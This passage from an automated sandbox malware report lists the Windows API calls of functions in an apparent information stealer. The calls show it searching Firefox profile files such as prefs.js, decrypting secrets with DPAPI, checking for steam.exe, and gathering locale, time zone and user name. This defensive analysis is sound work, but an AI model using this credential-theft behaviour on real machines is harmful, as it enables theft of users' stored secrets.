                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 0040D7E8
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040D8B3
                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 0040D956
                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0040D96A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                                      • String ID: prefs.js
                                                                                                                                                                                                                      • API String ID: 893096357-3783873740
                                                                                                                                                                                                                      • Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                                                                                                                      • Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99
                                                                                                                                                                                                                      Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040B780
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0040B8FF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3801961486-0
                                                                                                                                                                                                                      • Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                                                                                                                      • Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9
                                                                                                                                                                                                                      Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 004124E4
                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                      • String ID: steam.exe
                                                                                                                                                                                                                      • API String ID: 1799959500-2826358650
                                                                                                                                                                                                                      • Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                                                                                                                      • Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15
                                                                                                                                                                                                                      Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                                                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                      • String ID: /
                                                                                                                                                                                                                      • API String ID: 507856799-4001269591
                                                                                                                                                                                                                      • Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                                                                                                                      • Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54
                                                                                                                                                                                                                      Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1799959500-0
                                                                                                                                                                                                                      • Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                                                                                                                      • Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25
                                                                                                                                                                                                                      Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                                                                                                                      • LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                      • String ID: DPAPI
                                                                                                                                                                                                                      • API String ID: 2068576380-1690256801
                                                                                                                                                                                                                      • Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                                                                                                                                      • Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90
                                                                                                                                                                                                                      Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 907984538-0
                                                                                                                                                                                                                      • Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                                                                                                                      • Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69
                                                                                                                                                                                                                      Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00410D7D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 362916592-0
                                                                                                                                                                                                                      • Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                                                                                                                                      • Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785
                                                                                                                                                                                                                      Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
